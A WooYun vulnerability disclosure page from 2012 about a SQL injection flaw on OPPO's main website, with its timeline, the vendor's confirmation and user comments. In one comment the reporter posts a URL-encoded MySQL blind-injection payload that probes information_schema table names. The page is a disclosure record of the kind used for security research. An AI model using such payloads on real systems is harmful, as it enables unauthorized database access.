当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013697

漏洞标题:Oppo手机主站点Sql注射

相关厂商:广东欧珀移动通讯有限公司

漏洞作者: Vty

提交时间:2012-10-22 06:17

修复时间:2012-12-06 06:18

公开时间:2012-12-06 06:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-22: 细节已通知厂商并且等待厂商处理中
2012-10-25: 厂商已经确认,细节仅向厂商公开
2012-11-04: 细节向核心白帽子及相关领域专家公开
2012-11-14: 细节向普通白帽子公开
2012-11-24: 细节向实习白帽子公开
2012-12-06: 细节向公众公开

简要描述:

mysql盲注

详细说明:



漏洞证明:

修复方案:

赶紧修复吧,有木有礼物送上,各种测漏,哈哈

版权声明:转载请注明来源 Vty@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2012-10-25 17:12

厂商回复:

已通知相关人员处理,感谢 Vty 对OPPO的关注

最新状态:

暂无


漏洞评价:

评论

  1. 2012-10-22 06:29 | Vty ( 普通白帽子 | Rank:199 漏洞数:37 )

    %27%20aNd%20(select%20ord(substr(TABLE_NAME,10,1))%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(110,101,119,111,112,112,111,119,97,112)%20limit%2036,1)=109%20and%20%271%27=%271

  2. 2012-10-22 09:32 | shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)

    刚来个新厂商,你们就这样搞,洞都让你们挖完了

  3. 2012-10-22 09:34 | Vty ( 普通白帽子 | Rank:199 漏洞数:37 )

    @shack2 还有好多啊,赶紧去吧,哈哈

  4. 2012-10-25 19:34 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    我提交的那个Oppo漏洞肿么没审核???@xsser

  5. 2012-10-25 21:07 | Vty ( 普通白帽子 | Rank:199 漏洞数:37 )

    @广东欧珀移动通讯有限公司为什么只有八个分,为什么不送礼物,为什么这到底为什么,太恶心了